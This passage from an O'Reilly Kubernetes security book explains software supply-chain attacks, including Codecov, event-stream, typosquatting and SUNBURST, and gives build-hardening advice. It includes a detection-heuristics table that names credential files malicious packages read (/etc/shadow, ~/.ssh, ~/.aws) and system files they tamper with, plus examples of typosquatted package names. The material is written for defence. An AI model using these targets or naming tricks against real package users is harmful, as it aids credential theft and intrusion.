Kubernetes Operators are designed to reduce human error by automating Kubernetes configuration, and reactive to events. They interact with Kubernetes and whatever other resources are under the operator’s control. Those resources may be in a single namespace, multiple namespaces, or outside of Kubernetes. This means they are often highly privileged to enable this complex automation, and so bring a level of risk.

An Operator-based supply chain attack might allow Captain Hashjack to discreetly deploy their malicious workloads by misusing RBAC, and a rogue resource could go completely undetected. While this attack is not yet widely seen, it has the potential to compromise a great number of clusters.

You must appraise and security-test third-party Operators before trusting them: write tests for their RBAC permissions so you are alerted if they change, and ensure an Operator’s securityContext configuration is suitable for the workload.

Attacking Higher Up the Supply Chain

To attack BCTL, Captain Hashjack may consider attacking the organizations that supply its software, such as operating systems, vendors, and open source packages. Your open source libraries may also have vulnerabilities, the most devastating of which has historically been an Apache Struts RCE, CVE-2017-5638.

Trusted open source libraries may have been “backdoored” (such as NPM’s event-stream package) or may be removed from the registry while in active use, such as left-pad (although registries now look to avoid this by preventing “unpublishing” packages).

Note

CVE-2017-5638 affected Apache Struts, a Java web framework.

The server didn’t parse Content-Type HTTP headers correctly, which allowed any commands to be executed in the process namespace as the web server’s user.

Struts 2 has a history of critical security bugs,[3] many tied to its use of OGNL technology;[4] some vulnerabilities can lead to arbitrary code execution.

Wikipedia

Code distributed by vendors can be compromised, as Codecov was. An error in its container image creation process allowed an attacker to modify a Bash uploader script run by customers to start builds. This attack compromised build Secrets that may then have been used against other systems.

Tip

The number of organizations using Codecov was significant. Searching for Git repos with grep.app showed there were over 9,200 results in the top 500,000 public Git repos. GitHub shows 397,518 code results at the time of this writing.

Poorly written code that fails to handle untrusted user input or internal errors may have remotely exploitable vulnerabilities. Application security is responsible for preventing this easy access to your systems.

The industry-recognised moniker for this is “shift left,” which means you should run static and dynamic analysis of the code your developers write as they write it: add automated tooling to the IDE, provide a local security testing workflow, run configuration tests before deployment, and generally don’t leave security considerations to the last possible moment as has been traditional in software.

Types of Supply Chain Attack

TAG Security’s Catalog of Supply Chain Compromises lists attacks affecting packages with millions of weekly downloads across various application dependency repositories and vendors, and hundreds of millions of total installations.

The combined downloads, including both benign and malicious versions, for the most popular malicious packages (event-stream—190 million, eslint-scope—442 million, bootstrap-sass—30 million, and rest-client—114 million) sum to 776 million.

“Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”

In the quoted paper, the authors identify four actors in the open source supply chain:

  • Registry Maintainers (RMs)

  • Package Maintainers (PMs)

  • Developers (Devs)

  • End-users (Users)

Those with consumers have a responsibility to verify the code they pass to their customers, and a duty to provide verifiable metadata to build confidence in the artifacts.

There’s a lot to defend from to ensure that Users receive a trusted artifact (Table 4-4):

  • Source code

  • Publishing infrastructure

  • Dev tooling

  • Malicious maintainer

  • Negligence

  • Fake toolchain

  • Watering-hole attack

  • Multiple steps

Registry maintainers should guard publishing infrastructure from typosquatters: individuals that register a package that looks similar to a widely deployed package.

Table 4-4. Examples of attacking publishing infrastructure
Attack Package name Typosquatted name

Typosquatting

event-stream

eventstream

Different account

user/package

usr/package, user_/package

Combosquatting

package

package-2, package-ng

Account takeover

user/package

user/package—no change as the user has been compromised by to the attacker

Social engineering

user/package

user/package—no change as the user has willingly given repository access to the attacker

As Figure 4-8 demonstrates, the supply chain of a package manager holds many risks.

Simplified relationships of stakeholders and threats in the package manager ecosystem
Figure 4-8. Simplified relationships of stakeholders and threats in the package manager ecosystem (source: “Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”)

Open Source Ingestion

This attention to detail may become exhausting when applied to every package and quickly becomes impractical at scale. This is where a web of trust between producers and consumers alleviates some of the burden of double-checking the proofs at every link in the chain. However, nothing can be fully trusted, and regular reverification of code is necessary to account for newly announced CVEs or zero-days.

In “Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”, the authors identify relevant issues as listed in Table 4-5.

Table 4-5. Heuristic rules derived from existing supply chain attacks and other malware studies
Type Description

Metadata

The package name is similar to popular ones in the same registry.

The package name is the same as popular packages in other registries, but the authors are different.

The package depends on or shares authors with known malware.

The package has older versions released around the time as known malware.

The package contains Windows PE files or Linux ELF files.

Static

The package has customized installation logic.

The package adds network, process, or code generation APIs in recently released versions.

The package has flows from filesystem sources to network sinks.

The package has flows from network sources to code generation or process sinks.

Dynamic

The package contacts unexpected IPs or domains, where expected ones are official registries and code hosting services.

The package reads from sensitive file locations such as /etc/shadow, /home/<user>/.ssh, /home/<user>/.aws.

The package writes to sensitive file locations such as /usr/bin, /etc/sudoers, /home/<user>/.ssh/authorized_keys.

The package spawns unexpected processes, where expected ones are initialized to registry clients (e.g., pip).

The paper summarises that:

  • Typosquatting and account compromise are low-cost to an attacker, and are the most widely exploited attack vectors.

  • Stealing data and dropping backdoors are the most common malicious post-exploit behaviors, suggesting wide consumer targeting.

  • 20% of identified malwares have persisted in package managers for over 400 days and have more than 1K downloads.

  • New techniques include code obfuscation, multistage payloads, and logic bombs to evade detection.

Additionally, packages with lower numbers of installations are unlikely to act quickly on a reported compromise as Figure 4-9 demonstrates. It could be that the developers are not paid to support these open source packages. Creating incentives for these maintainers with well-written patches and timely assistance merging them, or financial support for handling reports from a bug bounty program, are effective ways to decrease vulnerabilities in popular but rarely maintained packages.

haku 0409
Figure 4-9. Correlation between number of persistence days and number of downloads (R&R = Reported and Removed; R&I = Reported and Investigating) (source: “Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”)

Application Vulnerability Throughout the SDLC

The Software Development Lifecycle (SDLC) is an application’s journey from a glint in a developer’s eye, to its secure build and deployment on production systems.

As applications progress from development to production they have a varying risk profile, as shown Table 4-6.

Table 4-6. Application vulnerabilities throughout the SDLC
System lifecycle stage Higher risk Lower risk

Development to production deployment

Application code (changes frequently)

Application libraries, operating system packages

Established production deployment to decommissioning

Slowly decaying application libraries and operating system packages

Application code (changes less frequently)

The risk profile of an application running in production changes as its lifespan lengthens, as its software becomes progressively more out-of-date. This is known as “reverse uptime”—the correlation between risk of an application’s compromise and the time since its deployment (e.g., the date of the container’s build). An average of reverse uptime in an organization could also be considered “mean time to …”:

  • Compromise (application has a remotely exploitable vulnerability)

  • Failure (application no longer works with the updated system or external APIs)

  • Update (change application code)

  • Patch (to update dependencies versions explicitly)

  • Rebuild (to pull new server dependencies)

Defending Against SUNBURST

So would the techniques in this chapter save you from a SUNBURST-like attack? Let’s look at how it worked.

The attackers gained access to the SolarWinds systems on 4th September 2019 (Figure 4-10). This might have happened perhaps through a spear-phishing email attack that allowed further escalation into SolarWind’s systems or through some software misconfiguration they found in build infrastructure or internet-facing servers.

haku 0410
Figure 4-10. SUNSPOT timeline

The threat actors stayed hidden for a week, then started testing the SUNSPOT injection code that would eventually compromise the SolarWinds product. This phase progressed quietly for two months.

Internal detection may have discovered the attackers here, however build infrastructure is rarely subjected to the same level of security scrutiny, intrusion detection, and monitoring as production systems. This is despite it delivering code to production or customers. This is something we can address using our more granular security controls around containers. Of course, a backdoor straight into a host system remains difficult to detect unless intrusion detection is running on the host, which may be noisy on shared build nodes that necessarily run many jobs for its consumers.

Almost six months after the initial compromise of the build infrastructure, the SUNSPOT malware was deployed. A month later, the infamous SolarWinds Hotfix 5 DLL containing the malicious implant was made available to customers, and once the threat actor confirmed that customers were infected, it removed its malware from the build VMs.

It was a further six months before the customer infections were identified.

This SUNSPOT malware changed source code immediately before it was compiled and immediately back to its original form afterwards, as shown in Figure 4-11. This required observing the filesystem and changing its contents.

SUNSPOT Malware
Figure 4-11. SUNSPOT malware

A build-stage signing tool that verifies its inputs and outputs (as in-toto does) then invokes a subprocess to perform a build step may be immune to this variant of the attack, although it may turn security into a race condition between the in-toto hash function and the malware that modifies the filesystem.

Bear in mind that if an attacker has control of your build environment, they can potentially modify any files in it. Although this is bad, they cannot regenerate signatures made outside the build: this is why your cryptographically signed artifacts are safer than unsigned binary blobs or Git code. Tampering of signed or checksummed artifacts can be detected because attackers are unlikely to have the private keys to, for example, sign tampered data.

SUNSPOT changed the files that were about to be compiled. In a container build, the same problem exists: the local filesystem must be trusted. Signing the inputs and validating outputs goes some way to mitigating this attack, but a motivated attacker with full control of a build system may be impossible to disambiguate from build activity.

It may not be possible to entirely protect a build system without a complete implementation of all supply chain security recommendations. Your organization’s ultimate risk appetite should be used to determine how much effort you wish to expend protecting this vital, vulnerable part of your system: for example, critical infrastructure projects may wish to fully audit the hardware and software they receive, root chains of trust in hardware modules wherever possible, and strictly regulate the employees permitted to interact with build systems. For most organizations, this will be deeply impractical.

Tip

Nixpkgs (utilized in NixOS) bootstraps deterministically from a small collection of tools. This is perhaps the ultimate in reproducible builds, with some useful security side effects; it allows end-to-end trust and reproducibility for all images built from it.

Trustix, another Nix project, compares build outputs against a Merkle tree log across multiple untrusted build servers to determine if a build has been compromised.

So these recommendations might not truly prevent supply chain compromise like SUNBURST, but they can protect some of the attack vectors and reduce your total risk exposure. To protect your build system:

  • Give developers root access to integration and testing environments, not build and packaging systems.

  • Use ephemeral build infrastructure and protect builds from cache poisoning.

  • Generate and distribute SBOMs so consumers can validate the artifacts.

  • Run intrusion detection on build servers.

  • Scan open source libraries and operating system packages.

  • Create reproducible builds on distributed infrastructure and compare the results to detect tampering.

  • Run hermetic, self-contained builds that only use what’s made available to them (instead of calling out to other systems or the internet), and avoid decision logic in build scripts.

  • Keep builds simple and easy to reason about, and security review and scan the build scripts like any other software.

Conclusion

Supply chain attacks are difficult to defend completely. Malicious software on public container registries is often detected rather than prevented, with the same for application libraries, and potential insecurity is part of the reality of using any third-party software.

The SLSA Framework suggests the milestones to achieve in order to secure your supply chain, assuming your build infrastructure is already secure! The Software Supply Chain Security paper details concrete patterns and practices for Source Code, Materials, Build Pipelines, Artifacts, and Deployments, to guide you on your supply chain security voyage.

Scanning container images and Git repositories for published CVEs is a cloud native application’s minimal viable security. If you assume all workloads are potentially hostile, your container security context and configuration should be tuned to match the workload’s sensitivity. Container seccomp and LSM profiles should always be configured to defend against new, undefined behavior or system calls from a freshly compromised dependency.

Sign your build artifacts with cosign, Notary, and in-toto during CI/CD, then validate their signatures whenever they are consumed. Distribute SBOMs so consumers can verify your dependency chain for new vulnerabilities. While these measures only contribute to wider supply chain security coverage, they frustrate attackers and decrease BCTL’s risk of falling prey to drive-by container pirates.

Get Hacking Kubernetes now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.